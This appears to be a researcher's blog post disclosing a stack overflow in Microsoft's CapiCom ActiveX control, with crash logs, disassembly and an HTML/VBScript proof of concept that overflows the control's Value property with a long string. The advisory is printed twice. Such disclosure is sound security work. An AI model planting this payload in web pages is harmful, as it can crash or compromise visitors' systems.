Enjoy:
http://shinnai.altervista.org/exploits/SH-001-20100714.html
Peace
venerdì 16 luglio 2010
venerdì 2 luglio 2010
#1 - Microsoft CapiCom OID Class Remote Stack Overflow
------------------------------------------------------------------------------------------------------------------------------
INFO:
------------------------------------------------------------------------------------------------------------------------------
Platform: Microsoft Windows 7 Professional
6.1.7600 N/D build 7600
File: CapiCom.dll
Ver.: 2.1.0.2
ProgID: CAPICOM.OID.1
Descr.: OID Class
GUID: {7BF3AC5C-CC84-429A-ACA5-74D916AD6B8C}
MD5: 9130cce19b5db3d2e31f9f789263fc4a
Marked as: RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
Description: The above file is vulnerable to a stack-based buffer overflow by assigning an overly string to the "Value"
(Property Let Value As String) property.
This could compromise a user's system.
See below for a proof of concept
Mitigation: A stack-canary protection seems to be used to protect against arbitrary code execution (see below)
------------------------------------------------------------------------------------------------------------------------------
FAULTMON REPORT
------------------------------------------------------------------------------------------------------------------------------
16:22:24.639 pid=0A5C tid=0688 EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C00000FD (STACK_OVERFLOW)
----------------------------------------------------------------
EAX=02BC2000: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=0224B1EC: 60 86 B0 60 86 B0 60 86-B0 60 86 B0 5E 86 AE 5E
EDX=07B40026: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00
ESP=02DBCCF8: 5A 72 3F 75 B5 3C 14 63-5A 48 2A FC 78 CD DB 02
EBP=02DBCD28: 44 CD DB 02 C3 3E B8 75-44 0A 6A 05 24 00 B4 07
ESI=056A0A44: 2C 22 12 63 18 22 12 63-01 00 00 00 02 00 00 00
EDI=00B71B02: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=631517A7: 85 00 EB E9 CC CC CC CC-CC 68 10 18 15 63 64 FF
--> TEST [EAX],EAX
----------------------------------------------------------------
16:22:24.639 pid=0A5C tid=0688 EXCEPTION (unhandled)
----------------------------------------------------------------
Exception C00000FD (STACK_OVERFLOW)
----------------------------------------------------------------
EAX=02BC2000: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=0224B1EC: 60 86 B0 60 86 B0 60 86-B0 60 86 B0 5E 86 AE 5E
EDX=07B40026: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00
ESP=02DBCCF8: 5A 72 3F 75 B5 3C 14 63-5A 48 2A FC 78 CD DB 02
EBP=02DBCD28: 44 CD DB 02 C3 3E B8 75-44 0A 6A 05 24 00 B4 07
ESI=056A0A44: 2C 22 12 63 18 22 12 63-01 00 00 00 02 00 00 00
EDI=00B71B02: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=631517A7: 85 00 EB E9 CC CC CC CC-CC 68 10 18 15 63 64 FF
--> TEST [EAX],EAX
----------------------------------------------------------------
16:22:25.877 pid=0A5C tid=08EC Thread exited with code 3221225725
------------------------------------------------------------------------------------------------------------------------------
SUBROUTINE
------------------------------------------------------------------------------------------------------------------------------
.text:0043177A align 10h
.text:00431780
.text:00431780 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
.text:00431780
.text:00431780
.text:00431780 __chkstk proc near ; CODE XREF: ATL::_ATL_SAFE_ALLOCA_IMPL::_Atlresetstkoflw(void)+32 p
.text:00431780 ; IPromptUser::GetDomainAndScheme(ushort *,ushort * *,INTERNET_SCHEME *)+A p ...
.text:00431780 push ecx
.text:00431781 lea ecx, [esp+4]
.text:00431785 sub ecx, eax
.text:00431787 sbb eax, eax
.text:00431789 not eax
.text:0043178B and ecx, eax
.text:0043178D mov eax, esp
.text:0043178F and eax, 0FFFFF000h
.text:00431794
.text:00431794 loc_431794: ; CODE XREF: __chkstk+29 j
.text:00431794 cmp ecx, eax
.text:00431796 jb short loc_4317A2
.text:00431798 mov eax, ecx
.text:0043179A pop ecx
.text:0043179B xchg eax, esp
.text:0043179C mov eax, [eax]
.text:0043179E mov [esp+0], eax
.text:004317A1 retn
.text:004317A2 ; ---------------------------------------------------------------------------
.text:004317A2
.text:004317A2 loc_4317A2: ; CODE XREF: __chkstk+16 j
.text:004317A2 sub eax, 1000h
.text:004317A7 test [eax], eax ; <-- CRASH OCCURS HERE
.text:004317A9 jmp short loc_431794
.text:004317A9 __chkstk endp
.text:004317A9
.text:004317A9 ; ---------------------------------------------------------------------------
.text:004317AB align 10h
------------------------------------------------------------------------------------------------------------------------------
STACK-CANARY PROTECTION (?)
------------------------------------------------------------------------------------------------------------------------------
.text:0041F281 arg_4 = dword ptr 0Ch
.text:0041F281 arg_8 = dword ptr 10h
.text:0041F281 arg_C = dword ptr 14h
.text:0041F281
.text:0041F281 mov edi, edi
.text:0041F283 push ebp
.text:0041F284 mov ebp, esp
.text:0041F286 mov eax, 1290h
.text:0041F28B call __chkstk
.text:0041F290 mov eax, ___security_cookie
------------------------------------------------------------------------------------------------------------------------------
PROOF OF CONCEPT
------------------------------------------------------------------------------------------------------------------------------
<html>
<object classid='clsid:7BF3AC5C-CC84-429A-ACA5-74D916AD6B8C' id='test'></object>
<script language = 'vbscript'>
buff = String(2097512, "A")
test.Value = buff
</script>
</html>
------------------------------------------------------------------------------------------------------------------------------
END
------------------------------------------------------------------------------------------------------------------------------
INFO:
------------------------------------------------------------------------------------------------------------------------------
Platform: Microsoft Windows 7 Professional
6.1.7600 N/D build 7600
File: CapiCom.dll
Ver.: 2.1.0.2
ProgID: CAPICOM.OID.1
Descr.: OID Class
GUID: {7BF3AC5C-CC84-429A-ACA5-74D916AD6B8C}
MD5: 9130cce19b5db3d2e31f9f789263fc4a
Marked as: RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
Description: The above file is vulnerable to a stack-based buffer overflow by assigning an overly string to the "Value"
(Property Let Value As String) property.
This could compromise a user's system.
See below for a proof of concept
Mitigation: A stack-canary protection seems to be used to protect against arbitrary code execution (see below)
------------------------------------------------------------------------------------------------------------------------------
FAULTMON REPORT
------------------------------------------------------------------------------------------------------------------------------
16:22:24.639 pid=0A5C tid=0688 EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C00000FD (STACK_OVERFLOW)
----------------------------------------------------------------
EAX=02BC2000: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=0224B1EC: 60 86 B0 60 86 B0 60 86-B0 60 86 B0 5E 86 AE 5E
EDX=07B40026: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00
ESP=02DBCCF8: 5A 72 3F 75 B5 3C 14 63-5A 48 2A FC 78 CD DB 02
EBP=02DBCD28: 44 CD DB 02 C3 3E B8 75-44 0A 6A 05 24 00 B4 07
ESI=056A0A44: 2C 22 12 63 18 22 12 63-01 00 00 00 02 00 00 00
EDI=00B71B02: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=631517A7: 85 00 EB E9 CC CC CC CC-CC 68 10 18 15 63 64 FF
--> TEST [EAX],EAX
----------------------------------------------------------------
16:22:24.639 pid=0A5C tid=0688 EXCEPTION (unhandled)
----------------------------------------------------------------
Exception C00000FD (STACK_OVERFLOW)
----------------------------------------------------------------
EAX=02BC2000: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=0224B1EC: 60 86 B0 60 86 B0 60 86-B0 60 86 B0 5E 86 AE 5E
EDX=07B40026: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00
ESP=02DBCCF8: 5A 72 3F 75 B5 3C 14 63-5A 48 2A FC 78 CD DB 02
EBP=02DBCD28: 44 CD DB 02 C3 3E B8 75-44 0A 6A 05 24 00 B4 07
ESI=056A0A44: 2C 22 12 63 18 22 12 63-01 00 00 00 02 00 00 00
EDI=00B71B02: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=631517A7: 85 00 EB E9 CC CC CC CC-CC 68 10 18 15 63 64 FF
--> TEST [EAX],EAX
----------------------------------------------------------------
16:22:25.877 pid=0A5C tid=08EC Thread exited with code 3221225725
------------------------------------------------------------------------------------------------------------------------------
SUBROUTINE
------------------------------------------------------------------------------------------------------------------------------
.text:0043177A align 10h
.text:00431780
.text:00431780 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
.text:00431780
.text:00431780
.text:00431780 __chkstk proc near ; CODE XREF: ATL::_ATL_SAFE_ALLOCA_IMPL::_Atlresetstkoflw(void)+32 p
.text:00431780 ; IPromptUser
.text:00431780 push ecx
.text:00431781 lea ecx, [esp+4]
.text:00431785 sub ecx, eax
.text:00431787 sbb eax, eax
.text:00431789 not eax
.text:0043178B and ecx, eax
.text:0043178D mov eax, esp
.text:0043178F and eax, 0FFFFF000h
.text:00431794
.text:00431794 loc_431794: ; CODE XREF: __chkstk+29 j
.text:00431794 cmp ecx, eax
.text:00431796 jb short loc_4317A2
.text:00431798 mov eax, ecx
.text:0043179A pop ecx
.text:0043179B xchg eax, esp
.text:0043179C mov eax, [eax]
.text:0043179E mov [esp+0], eax
.text:004317A1 retn
.text:004317A2 ; ---------------------------------------------------------------------------
.text:004317A2
.text:004317A2 loc_4317A2: ; CODE XREF: __chkstk+16 j
.text:004317A2 sub eax, 1000h
.text:004317A7 test [eax], eax ; <-- CRASH OCCURS HERE
.text:004317A9 jmp short loc_431794
.text:004317A9 __chkstk endp
.text:004317A9
.text:004317A9 ; ---------------------------------------------------------------------------
.text:004317AB align 10h
------------------------------------------------------------------------------------------------------------------------------
STACK-CANARY PROTECTION (?)
------------------------------------------------------------------------------------------------------------------------------
.text:0041F281 arg_4 = dword ptr 0Ch
.text:0041F281 arg_8 = dword ptr 10h
.text:0041F281 arg_C = dword ptr 14h
.text:0041F281
.text:0041F281 mov edi, edi
.text:0041F283 push ebp
.text:0041F284 mov ebp, esp
.text:0041F286 mov eax, 1290h
.text:0041F28B call __chkstk
.text:0041F290 mov eax, ___security_cookie
------------------------------------------------------------------------------------------------------------------------------
PROOF OF CONCEPT
------------------------------------------------------------------------------------------------------------------------------
<html>
<object classid='clsid:7BF3AC5C-CC84-429A-ACA5-74D916AD6B8C' id='test'></object>
<script language = 'vbscript'>
buff = String(2097512, "A")
test.Value = buff
</script>
</html>
------------------------------------------------------------------------------------------------------------------------------
END
------------------------------------------------------------------------------------------------------------------------------
Iscriviti a:
Post (Atom)